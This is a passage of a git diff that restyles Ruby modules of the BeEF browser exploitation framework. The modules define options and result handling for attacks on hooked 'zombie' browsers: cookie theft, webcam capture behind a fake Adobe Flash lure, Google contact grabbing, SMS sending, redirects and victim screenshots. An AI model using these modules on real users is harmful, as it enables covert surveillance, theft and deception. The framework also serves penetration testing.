b/modules/browser/hooked_domain/overflow_cookiejar/module.rb index 962349961..e4219791d 100644 --- a/modules/browser/hooked_domain/overflow_cookiejar/module.rb +++ b/modules/browser/hooked_domain/overflow_cookiejar/module.rb @@ -5,12 +5,12 @@ # class Overflow_cookiejar < BeEF::Core::Command def self.options - return [ - {'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'} - ] - end - def post_execute - save({'result' => @datastore['result']}) + [ + { 'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true' } + ] end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/browser/hooked_domain/prompt_dialog/module.rb b/modules/browser/hooked_domain/prompt_dialog/module.rb index 684b174d9..ea19672c0 100644 --- a/modules/browser/hooked_domain/prompt_dialog/module.rb +++ b/modules/browser/hooked_domain/prompt_dialog/module.rb @@ -4,22 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Prompt_dialog < BeEF::Core::Command - def self.options - return [ - {'name' =>'question', 'description' =>'Prompt text', 'ui_label'=>'Prompt text'} + [ + { 'name' => 'question', 'description' => 'Prompt text', 'ui_label' => 'Prompt text' } ] end - + # # This method is being called when a zombie sends some # data back to the framework. # def post_execute - -# return if @datastore['answer']=='' + # return if @datastore['answer']=='' - save({'answer' => @datastore['answer']}) + save({ 'answer' => @datastore['answer'] }) end - end diff --git a/modules/browser/hooked_domain/remove_stuck_iframes/module.rb b/modules/browser/hooked_domain/remove_stuck_iframes/module.rb index e758ba4a5..3637bc01d 100644 --- a/modules/browser/hooked_domain/remove_stuck_iframes/module.rb +++ b/modules/browser/hooked_domain/remove_stuck_iframes/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Remove_stuck_iframes < BeEF::Core::Command - def post_execute content = {} content['head'] = @datastore['head'] @@ -12,5 +11,4 @@ class Remove_stuck_iframes < BeEF::Core::Command content['iframe_'] = @datastore['iframe_'] save content end - end diff --git a/modules/browser/hooked_domain/replace_video/module.rb b/modules/browser/hooked_domain/replace_video/module.rb index 365f650c2..d4f0d7338 100644 --- a/modules/browser/hooked_domain/replace_video/module.rb +++ b/modules/browser/hooked_domain/replace_video/module.rb @@ -4,11 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Replace_video < BeEF::Core::Command - def self.options - return [ - {'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'}, - {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'} + [ + { 'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width' => '150px' }, + { 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' } ] end @@ -16,7 +15,5 @@ class Replace_video < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/browser/hooked_domain/rickroll/module.rb b/modules/browser/hooked_domain/rickroll/module.rb index db9852b24..b5139d5c4 100644 --- a/modules/browser/hooked_domain/rickroll/module.rb +++ b/modules/browser/hooked_domain/rickroll/module.rb @@ -4,12 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Rickroll < BeEF::Core::Command - def post_execute content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/browser/hooked_domain/site_redirect/module.rb b/modules/browser/hooked_domain/site_redirect/module.rb index af4c1a659..3ab0a4e96 100644 --- a/modules/browser/hooked_domain/site_redirect/module.rb +++ b/modules/browser/hooked_domain/site_redirect/module.rb @@ -4,15 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Site_redirect < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value'=>'http://beefproject.com/', 'width'=>'200px' } + [ + { 'ui_label' => 'Redirect URL', 'name' => 'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value' => 'http://beefproject.com/', + 'width' => '200px' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb index 357f527dd..ca584e193 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb +++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb @@ -4,29 +4,28 @@ # See the file 'doc/COPYING' for copying permission # class Site_redirect_iframe < BeEF::Core::Command - - def self.options - @configuration = BeEF::Core::Configuration.instance - proto = @configuration.beef_proto - beef_host = @configuration.beef_host - beef_port = @configuration.beef_port - base_host = "#{proto}://#{beef_host}:#{beef_port}" + def self.options + @configuration = BeEF::Core::Configuration.instance + proto = @configuration.beef_proto + beef_host = @configuration.beef_host + beef_port = @configuration.beef_port + base_host = "#{proto}://#{beef_host}:#{beef_port}" - favicon_uri = "#{base_host}/ui/media/images/favicon.ico" - return [ - { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, - { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, + favicon_uri = "#{base_host}/ui/media/images/favicon.ico" + [ + { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', + 'width' => '200px' }, + { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' }, - { 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' }, - { 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' } - ] - end + { 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width' => '200px' }, + { 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width' => '150px' } + ] + end # This method is being called when a hooked browser sends some # data back to the framework. # def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/browser/play_sound/module.rb b/modules/browser/play_sound/module.rb index 79773d385..4937b5a88 100644 --- a/modules/browser/play_sound/module.rb +++ b/modules/browser/play_sound/module.rb @@ -4,10 +4,8 @@ # See the file 'doc/COPYING' for copying permission # class Play_sound < BeEF::Core::Command - # set and return all options for this module def self.options - @configuration = BeEF::Core::Configuration.instance proto = @configuration.beef_proto beef_host = @configuration.beef_host @@ -16,20 +14,19 @@ class Play_sound < BeEF::Core::Command sound_file_url = "#{base_host}/demos/sound.wav" - return [{ - 'name' => 'sound_file_uri', + [{ + 'name' => 'sound_file_uri', 'description' => 'The web accessible URI for the wave sound file.', 'ui_label' => 'Sound File Path', 'value' => sound_file_url, - 'width' => '300px' - }] + 'width' => '300px' + }] end - def post_execute + def post_execute content = {} - content['result'] = @datastore['result'] - - save content + content['result'] = @datastore['result'] + + save content end - end diff --git a/modules/browser/remove_hook_element/module.rb b/modules/browser/remove_hook_element/module.rb index 4e6573a10..b38aa9d54 100644 --- a/modules/browser/remove_hook_element/module.rb +++ b/modules/browser/remove_hook_element/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Remove_hook_element < BeEF::Core::Command - - def post_execute - content = {} - content["result"] = @datastore["result"] if not @datastore["result"].nil? - save content - end - + def post_execute + content = {} + content['result'] = @datastore['result'] unless @datastore['result'].nil? + save content + end end diff --git a/modules/browser/spyder_eye/module.rb b/modules/browser/spyder_eye/module.rb index 81aa29fcb..a0e092db4 100644 --- a/modules/browser/spyder_eye/module.rb +++ b/modules/browser/spyder_eye/module.rb @@ -4,11 +4,11 @@ # See the file 'doc/COPYING' for copying permission # class Spyder_eye < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'Repeat', 'name'=>'repeat', 'description' => 'Number of snapshot to take.', 'value'=>'1', 'width'=>'80px' }, - { 'ui_label'=>'Delay', 'name'=>'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.', 'value'=>'3000', 'width'=>'80px' }, + [ + { 'ui_label' => 'Repeat', 'name' => 'repeat', 'description' => 'Number of snapshot to take.', 'value' => '1', 'width' => '80px' }, + { 'ui_label' => 'Delay', 'name' => 'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.', + 'value' => '3000', 'width' => '80px' } ] end @@ -16,23 +16,23 @@ class Spyder_eye < BeEF::Core::Command BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.min.js', '/h2c', 'js') end - def post_execute + def post_execute content = {} - content['results'] = @datastore['results'] if not @datastore['results'].nil? + content['results'] = @datastore['results'] unless @datastore['results'].nil? save content # save screenshot file begin - timestamp = Time.now.localtime.strftime("%Y-%m-%d_%H-%M-%S") + timestamp = Time.now.localtime.strftime('%Y-%m-%d_%H-%M-%S') ip = BeEF::Core::Models::BrowserDetails.get(session_id, 'browser.ipaddress') filename = "#{$home_dir}/screenshot_#{ip}_-_#{timestamp}_#{@datastore['cid']}.png" File.open(filename, 'wb') do |file| - data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "") + data = @datastore['results'].gsub(%r{^image=data:image/(png|jpg);base64,}, '') file.write(Base64.decode64(data)) end print_info("Browser screenshot saved to '#{filename}'") - BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'") - rescue => e + BeEF::Core::Logger.instance.register('Zombie', "Browser screenshot saved to '#{filename}'") + rescue StandardError => e print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}") end diff --git a/modules/browser/unhook/module.rb b/modules/browser/unhook/module.rb index 96aa63278..e82800666 100644 --- a/modules/browser/unhook/module.rb +++ b/modules/browser/unhook/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Unhook < BeEF::Core::Command - - def post_execute - content = {} - content["result"] = @datastore["result"] if not @datastore["result"].nil? - save content - end - + def post_execute + content = {} + content['result'] = @datastore['result'] unless @datastore['result'].nil? + save content + end end diff --git a/modules/browser/webcam_flash/module.rb b/modules/browser/webcam_flash/module.rb index 3cff09a6e..dc2b61f07 100644 --- a/modules/browser/webcam_flash/module.rb +++ b/modules/browser/webcam_flash/module.rb @@ -6,49 +6,49 @@ require 'base64' class Webcam_flash < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/takeit.swf', '/takeit', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_flash/swfobject.js', '/swfobject', 'js') end def self.options - configuration = BeEF::Core::Configuration.instance - social_engineering_title = "This website is using Adobe Flash" - social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience." - no_of_pictures = 20 - interval = 1000 - return [ - {'name' => 'social_engineering_title', - 'description' => 'The title that is shown to the victim.', - 'ui_label' => 'Social Engineering Title', - 'value' => social_engineering_title, - 'width' => '100px' }, { - 'name' => 'social_engineering_text', - 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.', - 'ui_label' => 'Social Engineering Text', - 'value' => social_engineering_text, - 'width' => '300px', - 'type' => 'textarea' }, { - 'name' => 'no_of_pictures', - 'description' => 'The number of pictures you want to take after the victim clicked "allow".', - 'ui_label' => 'Number of pictures', - 'value' => no_of_pictures, - 'width' => '100px' }, { - 'name' => 'interval', - 'description' => 'The interval in which pictures are taken.', - 'ui_label' => 'Interval to take pictures (ms)', - 'value' => interval, - 'width' => '100px' } - ] + social_engineering_title = 'This website is using Adobe Flash' + social_engineering_text = 'In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will improve your user experience.' + no_of_pictures = 20 + interval = 1000 + [ + { 'name' => 'social_engineering_title', + 'description' => 'The title that is shown to the victim.', + 'ui_label' => 'Social Engineering Title', + 'value' => social_engineering_title, + 'width' => '100px' }, { + 'name' => 'social_engineering_text', + 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.', + 'ui_label' => 'Social Engineering Text', + 'value' => social_engineering_text, + 'width' => '300px', + 'type' => 'textarea' + }, { + 'name' => 'no_of_pictures', + 'description' => 'The number of pictures you want to take after the victim clicked "allow".', + 'ui_label' => 'Number of pictures', + 'value' => no_of_pictures, + 'width' => '100px' + }, { + 'name' => 'interval', + 'description' => 'The interval in which pictures are taken.', + 'ui_label' => 'Interval to take pictures (ms)', + 'value' => interval, + 'width' => '100px' + } + ] end - - - def post_execute - content = {} - content["result"] = @datastore["result"] if not @datastore["result"].nil? - content["picture"] = @datastore["picture"] if not @datastore["picture"].nil? - save content - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') - end + def post_execute + content = {} + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['picture'] = @datastore['picture'] unless @datastore['picture'].nil? + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end end diff --git a/modules/browser/webcam_html5/module.rb b/modules/browser/webcam_html5/module.rb index f880a0006..c0672b51c 100644 --- a/modules/browser/webcam_html5/module.rb +++ b/modules/browser/webcam_html5/module.rb @@ -5,12 +5,10 @@ # require 'base64' class Webcam_html5 < BeEF::Core::Command - - def post_execute - content = {} - content["result"] = @datastore["result"] if not @datastore["result"].nil? - content["image"] = @datastore["image"] if not @datastore["image"].nil? - save content - end - + def post_execute + content = {} + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['image'] = @datastore['image'] unless @datastore['image'].nil? + save content + end end diff --git a/modules/browser/webcam_permission_check/module.rb b/modules/browser/webcam_permission_check/module.rb index f89325dc0..57615b089 100644 --- a/modules/browser/webcam_permission_check/module.rb +++ b/modules/browser/webcam_permission_check/module.rb @@ -6,14 +6,12 @@ class Webcam_permission_check < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js') - end - - def post_execute - - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf') - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js') end + def post_execute + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end end diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb index e97828658..fb4db417a 100644 --- a/modules/chrome_extensions/execute_tabs/module.rb +++ b/modules/chrome_extensions/execute_tabs/module.rb @@ -4,11 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Execute_tabs < BeEF::Core::Command - def self.options - return [ - {'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px'}, - {'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px'} + [ + { 'name' => 'url', 'ui_label' => 'URL', 'value' => 'https://www.google.com/accounts/EditUserInfo', 'width' => '500px' }, + { 'name' => 'theJS', 'ui_label' => 'Javascript', 'value' => 'prompt(\'BeEF\');', 'type' => 'textarea', 'width' => '400px', 'height' => '300px' } ] end @@ -17,6 +16,4 @@ class Execute_tabs < BeEF::Core::Command content['Return'] = @datastore['return'] save content end - end - diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb index f2e4e6c69..02a298759 100755 --- a/modules/chrome_extensions/get_all_cookies/module.rb +++ b/modules/chrome_extensions/get_all_cookies/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Get_all_cookies < BeEF::Core::Command - - def self.options - - return [ - {'name' =>'url', 'ui_label'=>'Domain (e.g. http://facebook.com)', 'value' => 'default_all'} + def self.options + [ + { 'name' => 'url', 'ui_label' => 'Domain (e.g. http://facebook.com)', 'value' => 'default_all' } ] end @@ -17,5 +15,4 @@ class Get_all_cookies < BeEF::Core::Command content['Return'] = @datastore['return'] save content end - end diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb index ca6236f12..6eb60c1a6 100644 --- a/modules/chrome_extensions/grab_google_contacts/module.rb +++ b/modules/chrome_extensions/grab_google_contacts/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Grab_google_contacts < BeEF::Core::Command - def post_execute content = {} content['Return'] = @datastore['return'] save content end - end diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb index ed516a5b9..37eadce78 100755 --- a/modules/chrome_extensions/inject_beef/module.rb +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Inject_beef < BeEF::Core::Command - def post_execute content = {} content['Return'] = @datastore['return'] save content end - end diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb index 31c448b5b..37d0c7d16 100755 --- a/modules/chrome_extensions/screenshot/module.rb +++ b/modules/chrome_extensions/screenshot/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Screenshot < BeEF::Core::Command - def post_execute content = {} content['Return'] = @datastore['return'] save content end - end diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb index 904d3f620..8e7fc1272 100755 --- a/modules/chrome_extensions/send_gvoice_sms/module.rb +++ b/modules/chrome_extensions/send_gvoice_sms/module.rb @@ -4,11 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Send_gvoice_sms < BeEF::Core::Command - def self.options - return [ - {'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' =>'textarea', 'width' => '300px'}, - {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px'} + [ + { 'name' => 'to', 'ui_label' => 'To', 'value' => '1234567890', 'type' => 'textarea', 'width' => '300px' }, + { 'name' => 'message', 'ui_label' => 'Message', 'value' => 'Hello from BeEF', 'type' => 'textarea', 'width' => '300px', 'height' => '200px' } ] end @@ -19,5 +18,4 @@ class Send_gvoice_sms < BeEF::Core::Command content['Status'] = @datastore['status'] save content end - end diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb index b6b3c5800..d36d63907 100644 --- a/modules/debug/test_beef_debug/module.rb +++ b/modules/debug/test_beef_debug/module.rb @@ -4,10 +4,10 @@ # See the file 'doc/COPYING' for copying permission # class Test_beef_debug < BeEF::Core::Command - def self.options - return [ - {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' } + [ + { 'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => 'Test string for beef.debug() function', 'type' => 'textarea', + 'width' => '400px', 'height' => '50px' } ] end @@ -16,5 +16,4 @@ class Test_beef_debug < BeEF::Core::Command content['Result'] = @datastore['result'] save content end - end diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb index 70ec42975..5a5c341c8 100644 --- a/modules/debug/test_cors_request/module.rb +++ b/modules/debug/test_cors_request/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Test_cors_request < BeEF::Core::Command - def post_execute content = {} content['response'] = @datastore['response'] @@ -12,12 +11,11 @@ class Test_cors_request < BeEF::Core::Command end def self.options - - return [ - {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, - {'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' }, - {'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' }, + [ + { 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, + { 'name' => 'url', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', + 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' }, + { 'name' => 'data', 'ui_label' => 'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' } ] end - end diff --git a/modules/debug/test_dns_tunnel_client/module.rb b/modules/debug/test_dns_tunnel_client/module.rb index 0544bfd38..71f6b0b24 100644 --- a/modules/debug/test_dns_tunnel_client/module.rb +++ b/modules/debug/test_dns_tunnel_client/module.rb @@ -4,23 +4,25 @@ # See the file 'doc/COPYING' for copying permission # class Test_dns_tunnel_client < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance + @configuration = BeEF::Core::Configuration.instance - return [ - {'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' }, - {'name' => 'data', 'ui_label'=>'Data to send', 'type' => 'textarea', 'value' => - 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac orci. In congue nunc vitae enim pharetra eleifend.', - 'width' => '400px', 'height' => '300px' - } + [ + { 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => 'browserhacker.com' }, + { 'name' => 'data', 'ui_label' => 'Data to send', 'type' => 'textarea', 'value' => + 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. ' \ + 'Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet ' \ + 'augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum ' \ + 'sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed ' \ + 'mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac ' \ + 'orci. In congue nunc vitae enim pharetra eleifend.', + 'width' => '400px', 'height' => '300px' } ] end - + def post_execute content = {} content['dns_requests'] = @datastore['dns_requests'] save content end - end diff --git a/modules/debug/test_get_variable/module.rb b/modules/debug/test_get_variable/module.rb index 2d55d1791..6b50fee3c 100644 --- a/modules/debug/test_get_variable/module.rb +++ b/modules/debug/test_get_variable/module.rb @@ -4,9 +4,7 @@ # See the file 'doc/COPYING' for copying permission # class Test_get_variable < BeEF::Core::Command - def self.options - return [{'name' => 'payload_name', 'ui_label'=>'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px'}] + [{ 'name' => 'payload_name', 'ui_label' => 'Payload Name', 'type' => 'text', 'value' => 'message', 'width' => '400px' }] end - end diff --git a/modules/debug/test_http_redirect/module.rb b/modules/debug/test_http_redirect/module.rb index 5132eb7c5..4e2800372 100644 --- a/modules/debug/test_http_redirect/module.rb +++ b/modules/debug/test_http_redirect/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Test_http_redirect < BeEF::Core::Command - def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect') end @@ -14,5 +13,4 @@ class Test_http_redirect < BeEF::Core::Command content['Result'] = @datastore['result'] save content end - end diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index a04b4bc2e..ace9036c0 100644 --- a/modules/debug/test_network_request/module.rb +++ b/modules/debug/test_network_request/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Test_network_request < BeEF::Core::Command - def post_execute content = {} content['response'] = @datastore['response'] @@ -15,19 +14,18 @@ class Test_network_request < BeEF::Core::Command @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.beef_host beef_port = @configuration.beef_port - hook_path = @configuration.get("beef.http.hook_file") + hook_path = @configuration.get('beef.http.hook_file') - return [ - {'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' }, - {'name' => 'method', 'ui_label'=>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, - {'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host }, - {'name' => 'port', 'ui_label'=>'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port }, - {'name' => 'path', 'ui_label'=>'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path }, - {'name' => 'anchor', 'ui_label'=>'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' }, - {'name' => 'data', 'ui_label'=>'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' }, - {'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width'=>'400px' }, - {'name' => 'dataType', 'ui_label'=>'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' }, + [ + { 'name' => 'scheme', 'ui_label' => 'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' }, + { 'name' => 'method', 'ui_label' => 'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' }, + { 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host }, + { 'name' => 'port', 'ui_label' => 'Port', 'type' => 'text', 'width' => '400px', 'value' => beef_port }, + { 'name' => 'path', 'ui_label' => 'Path', 'type' => 'text', 'width' => '400px', 'value' => hook_path }, + { 'name' => 'anchor', 'ui_label' => 'Anchor', 'type' => 'text', 'width' => '400px', 'value' => 'irrelevant' }, + { 'name' => 'data', 'ui_label' => 'Query String', 'type' => 'text', 'width' => '400px', 'value' => 'query=data' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '10', 'width' => '400px' }, + { 'name' => 'dataType', 'ui_label' => 'Data Type', 'type' => 'text', 'width' => '400px', 'value' => 'script' } ] end - end diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb index 99bb7f7e8..a8d97673f 100644 --- a/modules/debug/test_return_ascii_chars/module.rb +++ b/modules/debug/test_return_ascii_chars/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Test_return_ascii_chars < BeEF::Core::Command - def post_execute content = {} content['Result String'] = @datastore['result_string'] save content end - end diff --git a/modules/debug/test_return_image/module.rb b/modules/debug/test_return_image/module.rb index 9f44ce612..2e57b77e8 100644 --- a/modules/debug/test_return_image/module.rb +++ b/modules/debug/test_return_image/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Test_return_image < BeEF::Core::Command - def post_execute content = {} content['image'] = @datastore['image'] save content end - end diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb index 19327a56d..895359425 100644 --- a/modules/debug/test_return_long_string/module.rb +++ b/modules/debug/test_return_long_string/module.rb @@ -4,19 +4,16 @@ # See the file 'doc/COPYING' for copying permission # class Test_return_long_string < BeEF::Core::Command - def self.options - return [ - {'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' =>'1024'}, - {'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' =>'\u00AE'} + [ + { 'name' => 'repeat', 'description' => 'Times to repeat', 'ui_label' => 'Times to repeat', 'value' => '1024' }, + { 'name' => 'repeat_string', 'description' => 'Strings to repeat', 'ui_label' => 'String to repeat', 'value' => '\u00AE' } ] end - def post_execute content = {} content['Result String'] = @datastore['result_string'] save content end - end diff --git a/modules/exploits/apache_cookie_disclosure/module.rb 